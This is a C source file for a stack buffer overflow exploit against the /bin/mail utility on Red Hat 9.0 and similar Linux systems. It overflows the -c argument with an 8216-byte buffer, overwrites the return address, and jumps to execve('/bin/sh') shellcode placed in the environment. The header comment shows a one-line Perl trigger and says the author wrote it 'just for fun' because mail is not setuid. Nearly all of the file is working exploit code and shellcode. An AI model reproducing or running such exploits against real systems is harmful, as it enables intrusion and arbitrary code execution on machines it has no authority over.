/*
redhat 9.0 and some others linux have this vul.
#sorry for my poor english.
#/bin/mail -s test -c `perl -e print "A"x9000'` root@localhost,you can see something wrong.
#I write this exploit just for fun ,because "mail" have not suid.
code by OYXin (www.ph4nt0m.net)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFSIZE 8216

/*shellcode form s0t4ipv6@shellcode.com.ar*/
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
 "\x68\x2f\x62\x69\x6e\x89\xe3\x89"
 "\x64\x24\x0c\x89\x44\x24\x10\x8d"
 "\x4c\x24\x0c\x8b\x54\x24\x08\xb0"
 "\x0b\xcd\x80";
int main(void)
{
    char buf[BUFSIZE+16];
    char *prog[] = {"/bin/mail","-s","TEST","-c",buf,"root@localhost", NULL};
    char *env[] = {"HOME=OYXin", shellcode, NULL};
    unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) -
    strlen(shellcode) - 0x02;
    memset(buf,0x41,sizeof(buf));
    memcpy(buf+BUFSIZE,(char *)&ret,4);
    memcpy(buf+BUFSIZE+4,(char *)&ret,4);
    memcpy(buf+BUFSIZE+8,(char *)&ret,4);
    buf[BUFSIZE+12] = 0x00;
    execve(prog[0],prog,env);
    return 0;
}
/* you must enter "." and a return to get a shell.*/